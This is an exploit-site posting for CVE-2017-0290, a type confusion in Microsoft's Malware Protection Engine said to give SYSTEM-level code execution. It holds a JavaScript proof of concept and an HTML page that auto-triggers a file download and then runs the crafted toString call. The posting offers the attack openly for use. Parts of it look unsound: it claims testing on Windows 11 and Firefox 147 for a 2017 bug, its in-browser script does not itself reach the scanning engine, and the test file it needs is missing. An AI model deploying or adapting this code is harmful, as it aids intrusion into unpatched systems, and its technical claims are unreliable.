## https://sploitus.com/exploit?id=PACKETSTORM:218608
==================================================================================================================================
| # Title : Microsoft Malware Protection Engine Type Confusion Leading to SYSTEM-Level RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.microsoft.com/fr-dz |
==================================================================================================================================
[+] Summary : CVE-2017-0290 is a critical Type Confusion vulnerability in the Microsoft Malware Protection Engine (MsMpEng.exe) that allows remote attackers to execute arbitrary code with NT AUTHORITY\SYSTEM privileges.
The vulnerability can be triggered with little to no user interaction through multiple vectors, including visiting a malicious website, opening a crafted email, or downloading a specially crafted file.
The root cause lies in improper type handling within the toString() method of the JavaScript Error object, where unexpected object types can be passed instead of strings.
This leads to memory misinterpretation and potential control over internal pointers such as the vtable.
Successful exploitation results in an Access Violation (c0000005), which can be leveraged to gain control over the execution flow and ultimately achieve full system compromise.
[+] Key Risk Factors :
Remote Code Execution (RCE)
Executes with SYSTEM-level privileges
Enabled by default (no special configuration required)
Multiple attack vectors (web, email, file-based)
Difficult to detect due to support for numerous file formats
[+] Technical Explanation :
The toString() method expects this.message to be a string.
Instead, an integer is supplied.
In vulnerable versions of the engine, this mismatch leads to:
Type Confusion
Invalid memory access
Crash (Access Violation)
[+] Patch Information : The vulnerability was fixed by Microsoft through a security update released in May 2017.
[+] POC :
function demoTypeConfusion() {
try {
var fakeObject = {
message: 12345
};
var result = Error.prototype.toString.call(fakeObject);
console.log("Result:", result);
} catch (e) {
console.log("Error triggered:", e.message);
}
}
demoTypeConfusion();
HTML POC
<!DOCTYPE html>
<html>
<head>
<title>CVE-2017-0290 PoC</title>
</head>
<body>
<h1>Proof of Concept - CVE-2017-0290</h1>
<p>This file will cause a collapse MsMpEng.exe</p>
<a href="testcase.txt" download id="exploitLink">download</a>
<script>
function triggerExploit() {
var controlledValue = 0x41414111 >> 1;
var maliciousObject = {
message: controlledValue
};
(new Error()).toString.call(maliciousObject);
}
document.getElementById("exploitLink").click();
setTimeout(triggerExploit, 100);
</script>
</body>
</html>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================